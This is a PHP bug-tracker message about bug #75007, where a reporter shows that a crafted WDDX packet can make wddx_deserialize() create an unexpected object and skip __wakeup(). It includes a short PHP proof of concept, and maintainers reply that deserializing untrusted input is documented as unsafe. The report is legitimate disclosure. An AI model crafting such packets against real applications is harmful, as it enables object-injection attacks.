Bug #75007 [Opn]: Create an Unexpected Object in During WDDX Deserialization
| From: | cmb@php.net | Date: | Sat, 05 Dec 2020 16:20:29 +0000 |
| Subject: | Bug #75007 [Opn]: Create an Unexpected Object in During WDDX Deserialization | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-230874@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=75007&edit=1
ID: 75007
Updated by: cmb@php.net
Reported by: taoguangchen at icloud dot com
Summary: Create an Unexpected Object in During WDDX
Deserialization
Status: Open
Type: Bug
Package: WDDX related
Operating System: *
PHP Version: 5.6.31
Block user comment: N
Private report: N
New Comment:
Actually, this is not even a bug; the behavior is documented and
it is warned against passing untrusted input to that function.
Also, the complete WDDX extension is deprecated and unbundled as
of PHP 7.4.0.
Previous Comments:
------------------------------------------------------------------------
[2017-07-31 12:46:39] zeev@php.net
Like unserialize, wddx_deserialize() must not be fed with untrusted input.
Consequently we don't consider bugs in wddx_deserialize security vulnerabilities.
Removing Private flag...
------------------------------------------------------------------------
[2017-07-30 14:34:10] taoguangchen at icloud dot com
Description:
------------
Create an Unexpected Object in During WDDX Deserialization
In During WDDX Deserialization, an unexpected object can be created via the crafted wddx pockets,
and bypass __wakeup() method
PoC:
```
class obj {
function __wakeup() {
var_dump('hi');
}
}
$wddx = <<<EOT
<?xml version='1.0'?>
<wddxPacket version='1.0'>
<header/>
<data>
<struct>
<var name='php_class_name'>
<string>obj</string>
</var>
<var name='prop'>
<string>ryat</string>
</var>
EOT;
var_dump(wddx_deserialize($wddx));
```
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=75007&edit=1